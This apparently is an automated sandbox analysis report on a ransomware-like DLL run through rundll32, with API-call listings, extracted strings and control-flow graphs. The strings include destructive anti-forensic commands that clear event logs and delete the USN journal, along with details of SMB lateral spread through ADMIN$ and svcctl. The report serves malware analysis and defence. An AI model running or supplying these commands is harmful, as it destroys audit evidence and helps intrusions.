                                                                      • PathFindFileNameW.SHLWAPI(04867BC8,?), ref: 04857C51
                                                                      • wsprintfW.USER32 ref: 04857C6B
                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04857CB3
                                                                      • ExitProcess.KERNEL32 ref: 04857CBA
                                                                        • Part of subcall function 0485554A: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,?,0485790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege), ref: 04855561
                                                                        • Part of subcall function 0485554A: GetLastError.KERNEL32(?,?,?,0485790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,048579E8), ref: 0485556B
                                                                        • Part of subcall function 0485554A: CryptGenRandom.ADVAPI32(?,?,?,?,?,?,0485790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,048579E8), ref: 04855581
                                                                        • Part of subcall function 0485554A: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,0485790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,048579E8), ref: 0485558E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess$FileHeapThread$CryptNameVirtual$AllocContextCountExitFreeModulePathSleepTick$AcquireCriticalCurrentDirectoryErrorEventExistsFindInitializeLastProtectRandomReleaseSectionStartupSystemlstrcatmemcpysrandwsprintf
                                                                      • String ID: %ws C:\Windows\%ws,#1 %ws$\rundll32.exe
                                                                      • API String ID: 1016975789-3730106045
                                                                      • Opcode ID: 927ad15805dd6f6074e3850d894f055a301dfb0d61a130b4b75adaa6adb79cd5
                                                                      • Instruction ID: 0779d17444802257137cacb2f0bd0bd7d9aa0e6b143e9b29a36aaad83a5de786
                                                                      • Opcode Fuzzy Hash: 927ad15805dd6f6074e3850d894f055a301dfb0d61a130b4b75adaa6adb79cd5
                                                                      • Instruction Fuzzy Hash: DB81C6B1500209BFFB11AFB4DC84EAE7BADEF05308F048E65FD05E6161DA78AD448B61
                                                                      Function 04857146 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 172memorythreadprocessCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(?,?,00000000,?,04857AF8), ref: 04857164
                                                                        • Part of subcall function 04856F7C: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,04857170,00000000,?,04857AF8), ref: 04856F8E
                                                                        • Part of subcall function 04856F7C: GetProcAddress.KERNEL32(00000000), ref: 04856F95
                                                                        • Part of subcall function 04858313: FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 0485832A
                                                                        • Part of subcall function 04858313: LoadResource.KERNEL32(00000000), ref: 04858341
                                                                        • Part of subcall function 04858313: LockResource.KERNEL32(00000000), ref: 04858350
                                                                        • Part of subcall function 04858313: SizeofResource.KERNEL32(00000000), ref: 04858368
                                                                        • Part of subcall function 04858313: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 04858384
                                                                        • Part of subcall function 04858313: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0485838D
                                                                        • Part of subcall function 04858313: memcpy.MSVCRT(00000000,00000002,?,?,00000002), ref: 0485839C
                                                                        • Part of subcall function 04858313: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 048583B9
                                                                        • Part of subcall function 04858313: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 048583BC
                                                                        • Part of subcall function 04858313: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 0485840A
                                                                        • Part of subcall function 04858313: RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 0485840D
                                                                      • GetTempFileNameW.KERNELBASE(?,00000000,00000000,?,00000000,?,04857AF8), ref: 048571AA
                                                                      • CoCreateGuid.OLE32(?,74DF0F10,?,04857AF8), ref: 048571C8
                                                                      • StringFromCLSID.OLE32(?,?,?,04857AF8), ref: 048571E1
                                                                      • wsprintfW.USER32 ref: 0485721F
                                                                      • CreateThread.KERNELBASE(00000000,00000000,04856FFE,?,00000000,00000000), ref: 04857236
                                                                      • memset.MSVCRT ref: 04857259
                                                                      • wsprintfW.USER32 ref: 04857281
                                                                      • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 048572A6
                                                                      • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 048572B8
                                                                        • Part of subcall function 04856CC8: EnterCriticalSection.KERNEL32(?,04857B03), ref: 04856CCD
                                                                        • Part of subcall function 04856CC8: InterlockedExchange.KERNEL32(?,00000001), ref: 04856CD9
                                                                        • Part of subcall function 04856CC8: LeaveCriticalSection.KERNEL32(?), ref: 04856CE0
                                                                      • TerminateThread.KERNELBASE(?,00000000), ref: 048572CD
                                                                      • CloseHandle.KERNEL32(?), ref: 048572D6
                                                                      • DeleteFileW.KERNELBASE(?,?,?), ref: 04857306
                                                                      • CoTaskMemFree.OLE32(?,?,?,?,04857AF8), ref: 0485730F
                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,04857AF8), ref: 0485732C
                                                                      • HeapFree.KERNEL32(00000000,?,04857AF8), ref: 04857333
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Resource$CreateFree$AllocateCriticalFileHandleSectionThreadwsprintf$AddressCloseCurrentDeleteEnterExchangeFindFromGuidInterlockedLeaveLoadLockModuleNameObjectProcSingleSizeofStringTaskTempTerminateWaitmemcpymemset
                                                                      • String ID: "%ws" %ws$\\.\pipe\%ws
                                                                      • API String ID: 1475553426-4065786000
                                                                      • Opcode ID: 9b309cea18754e4bca006de76a0e6b2b187a716f3585a570bcce40f4c0413d8b
                                                                      • Instruction ID: 45b1c63edcef45a124a6d161f50b911d988f530966e3eb87c517e2d76e694129
                                                                      • Opcode Fuzzy Hash: 9b309cea18754e4bca006de76a0e6b2b187a716f3585a570bcce40f4c0413d8b
                                                                      • Instruction Fuzzy Hash: 8B510FB5900219BFDF11DFE8DC84DDEB7BDEB08254F448A65F905E3111EA78AE448B20
                                                                      Function 0485A1A9 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 149memorylibraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 212 485a1a9-485a1c7 213 485a1d0-485a1fa GetProcessHeap HeapAlloc 212->213 214 485a1c9-485a1cb call 485a016 212->214 216 485a200-485a213 GetProcessHeap HeapAlloc 213->216 217 485a32a-485a330 213->217 214->213 216->217 218 485a219-485a229 call 4856b0e 216->218 218->217 221 485a22f-485a235 218->221 222 485a245-485a24c 221->222 223 485a271 222->223 224 485a24e-485a260 CreateThread 222->224 227 485a275 223->227 225 485a266-485a26f 224->225 226 485a322-485a325 call 4856b46 224->226 225->227 226->217 228 485a277-485a27b 227->228 230 485a286-485a2af GetModuleHandleA GetProcAddress 228->230 231 485a27d-485a284 228->231 230->226 233 485a2b1-485a2b6 230->233 231->228 231->230 234 485a2d3-485a2d6 233->234 235 485a2b8-485a2be 233->235 236 485a2d8-485a2e7 CloseHandle 234->236 237 485a2ea-485a2f7 GetProcessHeap HeapAlloc 234->237 238 485a2c0-485a2c5 235->238 236->237 237->226 239 485a2f9-485a30c GetProcessHeap HeapAlloc 237->239 240 485a2c7-485a2ca 238->240 241 485a2ce-485a2d1 238->241 239->226 242 485a30e-485a31c call 4856ad0 239->242 240->238 243 485a2cc 240->243 241->237 242->226 246 485a237-485a243 242->246 243->237 246->222
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 0485A1EB
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0485A1F4
                                                                      • GetProcessHeap.KERNEL32(00000008,00000021), ref: 0485A209
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0485A20C
                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_0000A112,00000000,00000000,00000000), ref: 0485A258
                                                                      • GetModuleHandleA.KERNEL32(kernel32,WaitForMultipleObjects,00000000), ref: 0485A290
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0485A297
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0485A2E1
                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 0485A2EE
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0485A2F1
                                                                        • Part of subcall function 0485A016: GetCurrentThread.KERNEL32 ref: 0485A035
                                                                        • Part of subcall function 0485A016: OpenThreadToken.ADVAPI32(00000000), ref: 0485A03C
                                                                        • Part of subcall function 0485A016: DuplicateTokenEx.ADVAPI32(02000000,02000000,00000000,00000002,00000002,?), ref: 0485A059
                                                                        • Part of subcall function 0485A016: CloseHandle.KERNEL32(?,04856AA8,00000000,00000000,00000000,00000024,04856AA8,00000000,0000FFFF), ref: 0485A0F5
                                                                        • Part of subcall function 0485A016: CloseHandle.KERNEL32(0000FFFF,04856AA8,00000000,00000000,00000000,00000024,04856AA8,00000000,0000FFFF), ref: 0485A105
                                                                      • GetProcessHeap.KERNEL32(00000008,00000021), ref: 0485A2FD
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0485A300
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocHandleProcess$CloseThread$Token$AddressCreateCurrentDuplicateModuleOpenProc
                                                                      • String ID: WaitForMultipleObjects$kernel32
                                                                      • API String ID: 2880803415-195431251
                                                                      • Opcode ID: bce8075de5839ebcf3f8c1651fd7396b2668e4b12f26574f1dcb6256464b3d08
                                                                      • Instruction ID: ab4613e1b3a47093c35811d4674995a4f3e53b5bc9b8d6919a473a574ddec274
                                                                      • Opcode Fuzzy Hash: bce8075de5839ebcf3f8c1651fd7396b2668e4b12f26574f1dcb6256464b3d08
                                                                      • Instruction Fuzzy Hash: 9C419771A10305ABDF189FB8EC85AAEB7B4FF48305F104F19E911E7290EB74A940CB51
                                                                      Function 04855337 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 157memorynetworkCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 247 4855337-485535f GetProcessHeap HeapAlloc 248 4855365-485538f rand 247->248 249 48554fd-4855504 247->249 250 4855391-4855397 248->250 251 4855398-48553bf rand socket 248->251 250->251 252 48553c5-4855400 htons inet_addr connect 251->252 253 48554ed-48554f7 GetProcessHeap HeapFree 251->253 254 4855406-485540f call 4851ca3 252->254 255 48554df 252->255 253->249 258 4855414-4855416 254->258 256 48554e6-48554e7 closesocket 255->256 256->253 259 48554dc 258->259 260 485541c-4855432 call 4852191 258->260 259->255 263 48554c6 260->263 264 4855438-4855460 call 48546c7 call 48521dc 260->264 266 48554cd-48554da call 4851dd1 263->266 264->266 272 4855462-485547c call 4851eb9 264->272 266->256 272->266 275 485547e-4855492 call 4852054 272->275 275->266 278 4855494-48554aa call 4854ab5 275->278 278->266 281 48554ac-48554be call 485516b 278->281 281->266 284 48554c0-48554c4 281->284 284->266
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000024,0000FDE9,74DEDFF0,00000000,?,?,?,?,0485943A,?), ref: 0485534B
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,0485943A,?), ref: 04855352
                                                                      • rand.MSVCRT ref: 04855388
                                                                      • rand.MSVCRT ref: 048553A8
                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 048553B4
                                                                      • htons.WS2_32(000001BD), ref: 048553DA
                                                                      • inet_addr.WS2_32(?), ref: 048553E7
                                                                      • connect.WS2_32(00000000,?,00000010), ref: 048553F7
                                                                        • Part of subcall function 0485516B: GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,?,00000000,00000000,?,00000000,00000000,svcctl,00000001,?,00000000,00000000,IPC$), ref: 048551D3
                                                                        • Part of subcall function 0485516B: HeapAlloc.KERNEL32(00000000), ref: 048551DC
                                                                        • Part of subcall function 0485516B: GetProcessHeap.KERNEL32(00000008,00000020,?,?,?), ref: 04855205
                                                                        • Part of subcall function 0485516B: HeapAlloc.KERNEL32(00000000), ref: 04855208
                                                                        • Part of subcall function 0485516B: rand.MSVCRT ref: 0485521B
                                                                        • Part of subcall function 0485516B: rand.MSVCRT ref: 04855226
                                                                        • Part of subcall function 0485516B: rand.MSVCRT ref: 0485522F
                                                                        • Part of subcall function 0485516B: sprintf.MSVCRT ref: 04855246
                                                                        • Part of subcall function 0485516B: GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,?,?,0485943A), ref: 04855252
                                                                        • Part of subcall function 0485516B: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0485943A), ref: 04855255
                                                                      • closesocket.WS2_32(00000000), ref: 048554E7
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0485943A,?), ref: 048554F0
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,0485943A,?), ref: 048554F7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Processrand$Alloc$Freeclosesocketconnecthtonsinet_addrsocketsprintf
                                                                      • String ID: ADMIN$$cscc.dat
                                                                      • API String ID: 228017060-1100196981
                                                                      • Opcode ID: a88ee76fc8845a5fffb19e66736f48b58ea9913ddc6c0cd66dbe8b05dee8536c
                                                                      • Instruction ID: 7098177333eee16871d938a7eeeae284621711bd8366f042a16a17628112e5af
                                                                      • Opcode Fuzzy Hash: a88ee76fc8845a5fffb19e66736f48b58ea9913ddc6c0cd66dbe8b05dee8536c
                                                                      • Instruction Fuzzy Hash: 86516CB1900319BADB109FA4DC44EEFBBB9EF08355F004A44BD15E6261D779A948CB61
                                                                      Function 0485733C Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86memorylibraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 317 485733c-4857355 LoadLibraryW 318 4857425-4857429 317->318 319 485735b-485736d GetProcAddress 317->319 320 4857414 GetLastError 319->320 321 4857373-4857392 GetProcessHeap RtlAllocateHeap 319->321 322 485741a-4857424 FreeLibrary 320->322 321->322 323 4857398-48573ac 321->323 322->318 325 4857402-4857412 GetProcessHeap RtlFreeHeap 323->325 326 48573ae-48573b5 323->326 325->322 326->325 327 48573b7 326->327 328 48573ba-48573be 327->328 329 48573f5-4857400 328->329 330 48573c0-48573f2 wsprintfW call 4856b95 328->330 329->325 329->328 330->329
                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(iphlpapi.dll,00000000), ref: 0485734A
                                                                      • GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 04857363
                                                                      • GetProcessHeap.KERNEL32(00000008,00100000), ref: 0485737E
                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 04857385
                                                                      • wsprintfW.USER32 ref: 048573DC
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04857405
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 0485740C
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04857856), ref: 04857414
                                                                      • FreeLibrary.KERNEL32(?), ref: 0485741D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$FreeLibraryProcess$AddressAllocateErrorLastLoadProcwsprintf
                                                                      • String ID: %u.%u.%u.%u$GetExtendedTcpTable$iphlpapi.dll
                                                                      • API String ID: 2876140663-442984071
                                                                      • Opcode ID: cc74cc27ccd89a4f386f7566b5579cfd70e2233b16eb9e4f8fdd648c5e8b154b
                                                                      • Instruction ID: 21018791521f1d2aa8a8dc6bfe643cd2658b2ae82b3704a82a5dfcca24a32029
                                                                      • Opcode Fuzzy Hash: cc74cc27ccd89a4f386f7566b5579cfd70e2233b16eb9e4f8fdd648c5e8b154b
                                                                      • Instruction Fuzzy Hash: E4217C72900215ABDB119FA89C49AAEBBBDEF48302F048E65FD42E6141D778E9018B60
                                                                      Function 04859154 Relevance: 19.6, APIs: 13, Instructions: 81memoryfileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • FreeLibrary.KERNELBASE ref: 04859161
                                                                      • CreateFileW.KERNELBASE(04867BC8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 04859198
                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 048591A3
                                                                      • CloseHandle.KERNELBASE(?), ref: 048591AF
                                                                      • CreateFileW.KERNELBASE(04867BC8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 048591C1
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 048591D5
                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 048591D8
                                                                      • WriteFile.KERNELBASE(?,00000000,?,?,00000000), ref: 048591F1
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 048591FB
                                                                      • HeapFree.KERNEL32(00000000), ref: 048591FE
                                                                      • CloseHandle.KERNEL32(?), ref: 04859207
                                                                      • DeleteFileW.KERNELBASE(04867BC8), ref: 0485920E
                                                                      • ExitProcess.KERNEL32 ref: 04859234
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: File$Heap$Process$CloseCreateFreeHandle$AllocateDeleteExitLibrarySizeWrite
                                                                      • String ID:
                                                                      • API String ID: 2157157325-0
                                                                      • Opcode ID: 74ab5349d87fe8c23efc71f6fe61ff97e800206f4a2cda4f2f9a0eb2751981cf
                                                                      • Instruction ID: b9f26fc7bd5513705628fa1668a9eab46571983584e5100b117531f740cc74a3
                                                                      • Opcode Fuzzy Hash: 74ab5349d87fe8c23efc71f6fe61ff97e800206f4a2cda4f2f9a0eb2751981cf
                                                                      • Instruction Fuzzy Hash: 162105B1801214FBEB116FA1BC48E8EBFADEF49754F108D51FA15E2160D638AA51DBA0
                                                                      Function 0485808E Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 64COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 411 485808e-48580f7 wsprintfW * 4 412 48580fa-4858104 411->412 412->412 413 4858106-4858146 wsprintfW call 4857fb7 412->413
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: wsprintf
                                                                      • String ID: %wswevtutil cl %ws & $Application$Security$Setup$System$fsutil usn deletejournal /D %c:
                                                                      • API String ID: 2111968516-1905612841
                                                                      • Opcode ID: c941cc15ff33b0abc91355d45b3a764d6bd1446da50af481a4dee6beb6356f26
                                                                      • Instruction ID: 3a5c4bf57a539807853f0345fd0410e026e284fb7ce0b14b5b16aae440ab48af
                                                                      • Opcode Fuzzy Hash: c941cc15ff33b0abc91355d45b3a764d6bd1446da50af481a4dee6beb6356f26
                                                                      • Instruction Fuzzy Hash: C5118666A003286ADB60D6A49C89EE777ACDF04654F000A91F959D3101EB74EE848BB5
                                                                      Function 04858A6F Relevance: 16.6, APIs: 11, Instructions: 77sleepmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00002000), ref: 04858A81
                                                                      • Sleep.KERNELBASE(000001F4), ref: 04858A90
                                                                      • GetSystemMetrics.USER32(00002000), ref: 04858A93
                                                                      • SetEvent.KERNEL32(?), ref: 04858A9C
                                                                      • Sleep.KERNEL32(000003E8), ref: 04858AAB
                                                                      • htonl.WS2_32(74DF0F00), ref: 04858AD4
                                                                      • htonl.WS2_32(74DF0F00), ref: 04858AE1
                                                                      • inet_ntoa.WS2_32(00000000), ref: 04858AE4
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 04858B02
                                                                      • HeapFree.KERNEL32(00000000), ref: 04858B09
                                                                      • LocalFree.KERNEL32(?,00002000,75C04920,74DF0F00), ref: 04858B1F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: FreeHeapMetricsSleepSystemhtonl$EventLocalProcessinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 4223591894-0
                                                                      • Opcode ID: 6e02101c671d07008a9efb4234f46df97bb77f2d6afd075e7ed604e99f34ac85
                                                                      • Instruction ID: e27fefaa7f9757f7145cdb90506b89a1cb7d69abb10cce14408b7c5b4a7423ed
                                                                      • Opcode Fuzzy Hash: 6e02101c671d07008a9efb4234f46df97bb77f2d6afd075e7ed604e99f34ac85
                                                                      • Instruction Fuzzy Hash: C5118C71600309BBEB01BFA5DC88C5FBAACEF48340B048D26ED05E7111DA78FD418AA2
                                                                      Function 04857FB7 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 80sleepprocessstringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • wsprintfW.USER32 ref: 04857FD6
                                                                      • GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04857FFA
                                                                      • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0485800C
                                                                      • lstrcatW.KERNEL32(?,\cmd.exe), ref: 04858022
                                                                      • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04858069
                                                                      • Sleep.KERNELBASE(00000000), ref: 0485807F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectoryEnvironmentProcessSleepSystemVariablelstrcatwsprintf
                                                                      • String ID: /c %ws$ComSpec$\cmd.exe
                                                                      • API String ID: 1518394870-1564754240
                                                                      • Opcode ID: 448afed0b8f3e8cce85c1b5972a9a2235d9bf23804b9198992c783da26626128
                                                                      • Instruction ID: 054382bcd987f555d39e85fac57f993c52c6f4085b4376be7a05eefa065b9016
                                                                      • Opcode Fuzzy Hash: 448afed0b8f3e8cce85c1b5972a9a2235d9bf23804b9198992c783da26626128
                                                                      • Instruction Fuzzy Hash: FE21AA726002086FDB10FFA5DC88EEB77ADEB54341F108966F946E6150E639EE588B30
                                                                      Function 04851000 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52sleepstringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 04857FB7: wsprintfW.USER32 ref: 04857FD6
                                                                        • Part of subcall function 04857FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04857FFA
                                                                        • Part of subcall function 04857FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0485800C
                                                                        • Part of subcall function 04857FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 04858022
                                                                        • Part of subcall function 04857FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04858069
                                                                        • Part of subcall function 04857FB7: Sleep.KERNELBASE(00000000), ref: 0485807F
                                                                      • Sleep.KERNELBASE(000007D0,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 04851021
                                                                      • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 04851039
                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0485104B
                                                                      • lstrcatW.KERNEL32(?,\cmd.exe,?,00000000), ref: 04851061
                                                                      • wsprintfW.USER32 ref: 04851087
